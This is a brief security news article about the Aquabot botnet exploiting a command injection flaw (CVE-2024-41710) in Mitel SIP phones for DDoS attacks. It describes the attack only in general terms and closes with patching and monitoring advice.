Aquabot botnet has started exploiting vulnerable in Mitel SIP phones to launch the DDoS attacks, according to a recent report. This Mirai-based malware targets CVE-2024-41710, a high-severity command injection flaw found in multiple Mitel phone series.
In July 2024, Mitel released firmware updates to patch the flaw. The vulnerability allows an authenticated attacker with admin access to inject malicious commands during the whole boot process. If exploited, attackers can run arbitrary commands, threatening device security and network integrity.
How Hackers Are Exploiting the Flaw
In August 2024, a researcher published proof-of-concept (PoC) code, demonstrating how attackers could bypass security filters using crafted HTTP POST requests. By manipulating configuration files, hackers could force the phone to execute malicious scripts at startup.
By January 2025, security experts detected real-world attacks using this exploit. The observed payload closely matched the PoC code. Hackers used it to download and execute a shell script, which then installed the Aquabot malware onto vulnerable Mitel SIP phones.
Once infected, the devices will connected to a command-and-control (C&C) server. This allowed attackers to monitor bot health and control DDoS attack functions.
Other Devices Targeted by Aquabot
Aquabot is not limited to only Mitel phones. Hackers have also targeted vulnerabilities in Hadoop YARN, Roxy-WI web interface, and routers from Linksys, Teltonika, Dasan GPON, and LB-LINK.
Additionally, just weeks before the CVE-2024-41710 exploit surfaced, the US cybersecurity agency CISA warned about two other critical Mitel vulnerabilities being exploited in the wild.
How to Prevent Aquabot Infections
Organizations should immediately apply firmware updates for Mitel SIP phones and other vulnerable devices. Enforcing strong access controls and disabling unnecessary admin privileges can reduce risks. Additionally, monitoring network traffic for unusual activity can help detect early signs of infection. Companies should also block known malicious IPs and use firewalls to filter unauthorized traffic.
